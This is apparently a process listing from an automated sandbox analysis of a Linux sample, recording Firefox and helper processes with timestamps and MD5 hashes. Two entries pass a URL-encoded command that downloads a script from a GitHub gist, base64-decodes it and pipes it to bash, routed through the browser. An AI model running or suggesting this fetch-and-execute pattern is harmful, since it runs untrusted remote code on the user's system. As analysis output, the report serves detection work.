                                                                                                                              Arguments:/usr/bin/x-www-browser http://bash%20-c%20\u201ccurl%20%20https://gist.githubusercontent.com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh%20%7C%20base64%20-d%20%7C%20bash\u201d
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              Start time:22:43:43
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/bin/x-www-browser
                                                                                                                              Arguments:n/a
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              Start time:22:43:43
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/bin/which
                                                                                                                              Arguments:which /usr/bin/x-www-browser
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              Start time:22:43:43
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:/usr/lib/firefox/firefox http://bash%20-c%20\u201ccurl%20%20https://gist.githubusercontent.com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh%20%7C%20base64%20-d%20%7C%20bash\u201d
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:43:43
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:n/a
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7
                                                                                                                              Start time:22:43:45
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:n/a
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:43:49
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:n/a
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:43:49
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/bin/lsb_release
                                                                                                                              Arguments:/usr/bin/lsb_release -idrc
                                                                                                                              File size:5490352 bytes
                                                                                                                              MD5 hash:69f442c3e33b5f9a66b722c29ad89435

                                                                                                                              Start time:22:43:52
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:n/a
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:43:52
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/bin/dbus-launch
                                                                                                                              Arguments:dbus-launch --autolaunch=ee49dfd4fa47433baee88884e2d7de7c --binary-syntax --close-stderr
                                                                                                                              File size:34960 bytes
                                                                                                                              MD5 hash:0b22a45154a51c6121bb1d208d8ab203

                                                                                                                              Start time:22:43:54
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:n/a
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:43:54
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:n/a
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:43:54
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:/usr/lib/firefox/firefox -contentproc -parentBuildID 20210816143654 -prefsLen 1 -prefMapSize 238647 -appdir /usr/lib/firefox/browser 6234 true socket
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:43:59
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:n/a
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:43:59
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:n/a
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:43:59
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:/usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 102 -prefMapSize 238647 -jsInit 285716 -parentBuildID 20210816143654 -appdir /usr/lib/firefox/browser 6234 true tab
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:44:10
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:n/a
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:44:11
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:n/a
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:44:11
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:/usr/lib/firefox/firefox -contentproc -childID 2 -isForBrowser -prefsLen 5165 -prefMapSize 238647 -jsInit 285716 -parentBuildID 20210816143654 -appdir /usr/lib/firefox/browser 6234 true tab
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:44:36
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:n/a
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:44:36
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:n/a
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7

                                                                                                                              Start time:22:44:36
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/firefox/firefox
                                                                                                                              Arguments:/usr/lib/firefox/firefox -contentproc -childID 3 -isForBrowser -prefsLen 6013 -prefMapSize 238647 -jsInit 285716 -parentBuildID 20210816143654 -appdir /usr/lib/firefox/browser 6234 true tab
                                                                                                                              File size:736648 bytes
                                                                                                                              MD5 hash:bf9680bcd223dba6b6e38b63bc4f73d7